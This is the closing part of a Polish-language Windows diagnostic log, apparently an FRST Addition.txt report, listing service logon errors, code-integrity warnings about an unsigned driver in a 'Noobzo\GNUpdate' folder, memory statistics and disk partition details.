Error: (06/13/2017 12:20:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Ochrona oprogramowania z powodu następującego błędu: 
Usługa nie została uruchomiona z powodu nieudanego logowania.

Error: (06/13/2017 12:20:01 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Usługa sppsvc nie może zalogować się jako NT AUTHORITY\NetworkService za pomocą obecnie skonfigurowanego hasła z powodu następującego błędu: 
Żądanie nie jest obsługiwane.


Aby upewnić się, że usługa jest skonfigurowana prawidłowo, użyj przystawki Usługi w programie Microsoft Management Console (MMC).

Error: (06/13/2017 12:20:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Instalator Windows z powodu następującego błędu: 
Usługa nie została uruchomiona z powodu nieudanego logowania.

Error: (06/13/2017 12:20:00 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Usługa msiserver nie może zalogować się jako NT AUTHORITY\SYSTEM za pomocą obecnie skonfigurowanego hasła z powodu następującego błędu: 
Żądanie nie jest obsługiwane.


Aby upewnić się, że usługa jest skonfigurowana prawidłowo, użyj przystawki Usługi w programie Microsoft Management Console (MMC).

Error: (06/13/2017 12:18:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Usługa Szybka instalacja pakietu Microsoft Office niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (06/13/2017 12:18:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Ochrona oprogramowania niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.


CodeIntegrity:
===================================
  Date: 2017-06-13 12:01:58.979
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-06-13 12:01:58.949
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-06-13 11:50:21.367
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-06-13 11:50:21.352
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-06-12 22:31:24.826
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-06-12 22:31:24.794
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-12 22:20:12.347
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\agrsm64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-12 22:20:12.327
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\agrsm64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Statystyki pamięci =========================== 

Procesor: Intel(R) Core(TM)2 Duo CPU T9600 @ 2.80GHz
Procent pamięci w użyciu: 56%
Całkowita pamięć fizyczna: 4060.27 MB
Dostępna pamięć fizyczna: 1765.94 MB
Całkowita pamięć wirtualna: 6106.45 MB
Dostępna pamięć wirtualna: 3631.34 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:232.79 GB) (Free:104.6 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 78DF78DF)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== Koniec  Addition.txt ============================